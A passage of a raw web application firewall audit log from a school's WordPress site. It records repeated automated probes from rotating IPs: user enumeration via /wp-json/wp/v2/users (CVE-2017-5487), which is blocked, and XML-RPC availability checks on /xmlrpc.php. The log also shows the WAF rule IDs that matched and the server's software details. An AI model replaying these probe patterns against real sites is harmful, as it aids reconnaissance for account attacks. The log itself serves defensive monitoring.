+0700] aBjiugRwKNFSM6B7_LagjAAAAIc 103.236.140.4 47360 103.236.140.4 8181 --a5b1303b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a5b1303b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5b1303b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461370043510 3030 (- - -) Stopwatch2: 1746461370043510 3030; combined=1536, p1=507, p2=999, p3=0, p4=0, p5=30, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5b1303b-Z-- --61b79643-A-- [05/May/2025:23:09:33 +0700] aBjivYZWvR7-42f6JrANLwAAAMI 103.236.140.4 47396 103.236.140.4 8181 --61b79643-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.22 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --61b79643-C-- demo.sayHello --61b79643-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --61b79643-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461373401711 5610 (- - -) Stopwatch2: 1746461373401711 5610; combined=4631, p1=602, p2=3784, p3=44, p4=45, p5=93, sr=75, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61b79643-Z-- --a2e2ae11-A-- [05/May/2025:23:09:41 +0700] aBjixQRwKNFSM6B7_LagkQAAAI8 103.236.140.4 47468 103.236.140.4 8181 --a2e2ae11-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.235 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a2e2ae11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2e2ae11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461381158869 3005 (- - -) Stopwatch2: 1746461381158869 3005; combined=1322, p1=426, p2=868, p3=0, p4=0, p5=28, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2e2ae11-Z-- --c67ef75b-A-- [05/May/2025:23:09:44 +0700] aBjiyPZJDMuQndL03JNdIAAAAE8 103.236.140.4 47496 103.236.140.4 8181 --c67ef75b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.235 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c67ef75b-C-- demo.sayHello --c67ef75b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c67ef75b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461384137472 5532 (- - -) Stopwatch2: 1746461384137472 5532; combined=4090, p1=517, p2=3350, p3=32, p4=35, p5=93, sr=73, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c67ef75b-Z-- --b5e29523-A-- [05/May/2025:23:09:58 +0700] aBji1vZJDMuQndL03JNdKgAAAFQ 103.236.140.4 47624 103.236.140.4 8181 --b5e29523-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.19 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b5e29523-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5e29523-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461398420394 2790 (- - -) Stopwatch2: 1746461398420394 2790; combined=1260, p1=405, p2=826, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5e29523-Z-- --e40ba15a-A-- [05/May/2025:23:10:01 +0700] aBji2QRwKNFSM6B7_LagogAAAIQ 103.236.140.4 47660 103.236.140.4 8181 --e40ba15a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.19 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e40ba15a-C-- demo.sayHello --e40ba15a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e40ba15a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461401370521 4536 (- - -) Stopwatch2: 1746461401370521 4536; combined=3281, p1=423, p2=2675, p3=28, p4=30, p5=74, sr=60, sw=51, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e40ba15a-Z-- --3ec77a2c-A-- [05/May/2025:23:10:11 +0700] aBji4wRwKNFSM6B7_LagsQAAAJY 103.236.140.4 47758 103.236.140.4 8181 --3ec77a2c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.169 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3ec77a2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ec77a2c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461411275406 2887 (- - -) Stopwatch2: 1746461411275406 2887; combined=1413, p1=472, p2=909, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ec77a2c-Z-- --e3fe8775-A-- [05/May/2025:23:10:14 +0700] aBji5oZWvR7-42f6JrANRwAAANM 103.236.140.4 47782 103.236.140.4 8181 --e3fe8775-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.169 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e3fe8775-C-- demo.sayHello --e3fe8775-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3fe8775-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461414164516 5072 (- - -) Stopwatch2: 1746461414164516 5072; combined=4180, p1=493, p2=3355, p3=31, p4=34, p5=148, sr=72, sw=119, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3fe8775-Z-- --0e62b45b-A-- [05/May/2025:23:10:15 +0700] aBji54ZWvR7-42f6JrANSgAAANc 103.236.140.4 47792 103.236.140.4 8181 --0e62b45b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.244 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0e62b45b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e62b45b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461415302225 15770 (- - -) Stopwatch2: 1746461415302225 15770; combined=26303, p1=481, p2=783, p3=0, p4=0, p5=12539, sr=133, sw=0, l=0, gc=12500 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e62b45b-Z-- --b02c6758-A-- [05/May/2025:23:10:19 +0700] aBji602V_h1VFAgsfgZ9dwAAAAQ 103.236.140.4 47826 103.236.140.4 8181 --b02c6758-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.244 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b02c6758-C-- demo.sayHello --b02c6758-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b02c6758-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461419437239 6266 (- - -) Stopwatch2: 1746461419437239 6266; combined=4832, p1=587, p2=4000, p3=40, p4=42, p5=97, sr=78, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b02c6758-Z-- --0c602535-A-- [05/May/2025:23:10:27 +0700] aBji8wRwKNFSM6B7_LagtwAAAII 103.236.140.4 47912 103.236.140.4 8181 --0c602535-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.180 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0c602535-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c602535-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461427902908 3344 (- - -) Stopwatch2: 1746461427902908 3344; combined=1529, p1=515, p2=971, p3=0, p4=0, p5=43, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c602535-Z-- --5a286555-A-- [05/May/2025:23:10:29 +0700] aBji9YZWvR7-42f6JrANTgAAAM4 103.236.140.4 47918 103.236.140.4 8181 --5a286555-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.106.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.106.242 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5a286555-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a286555-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461429120858 2875 (- - -) Stopwatch2: 1746461429120858 2875; combined=1414, p1=485, p2=898, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a286555-Z-- --50ec5c78-A-- [05/May/2025:23:10:30 +0700] aBji9vZJDMuQndL03JNdOAAAAEQ 103.236.140.4 47948 103.236.140.4 8181 --50ec5c78-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.180 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --50ec5c78-C-- demo.sayHello --50ec5c78-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --50ec5c78-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461430680050 5169 (- - -) Stopwatch2: 1746461430680050 5169; combined=4056, p1=510, p2=3327, p3=31, p4=34, p5=91, sr=87, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50ec5c78-Z-- --2f91bd7b-A-- [05/May/2025:23:10:31 +0700] aBji94ZWvR7-42f6JrANUwAAAMw 103.236.140.4 47954 103.236.140.4 8181 --2f91bd7b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.106.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.106.242 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2f91bd7b-C-- demo.sayHello --2f91bd7b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f91bd7b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461431910404 4834 (- - -) Stopwatch2: 1746461431910404 4834; combined=3728, p1=455, p2=3070, p3=28, p4=27, p5=87, sr=74, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f91bd7b-Z-- --1fb6c65f-A-- [05/May/2025:23:10:35 +0700] aBji-4ZWvR7-42f6JrANXQAAAMs 103.236.140.4 48000 103.236.140.4 8181 --1fb6c65f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.73.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.73.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1fb6c65f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fb6c65f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461435177389 3360 (- - -) Stopwatch2: 1746461435177389 3360; combined=1419, p1=477, p2=900, p3=0, p4=0, p5=42, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1fb6c65f-Z-- --dd5e1c0c-A-- [05/May/2025:23:10:39 +0700] aBji_4ZWvR7-42f6JrANaAAAANg 103.236.140.4 48044 103.236.140.4 8181 --dd5e1c0c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.73.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.73.109 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dd5e1c0c-C-- demo.sayHello --dd5e1c0c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd5e1c0c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461439497218 6696 (- - -) Stopwatch2: 1746461439497218 6696; combined=4847, p1=592, p2=4007, p3=39, p4=43, p5=99, sr=77, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd5e1c0c-Z-- --63829614-A-- [05/May/2025:23:10:43 +0700] aBjjA4ZWvR7-42f6JrANcgAAANc 103.236.140.4 48080 103.236.140.4 8181 --63829614-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.167.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.167.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --63829614-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63829614-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461443974487 3443 (- - -) Stopwatch2: 1746461443974487 3443; combined=1509, p1=530, p2=942, p3=0, p4=0, p5=37, sr=123, 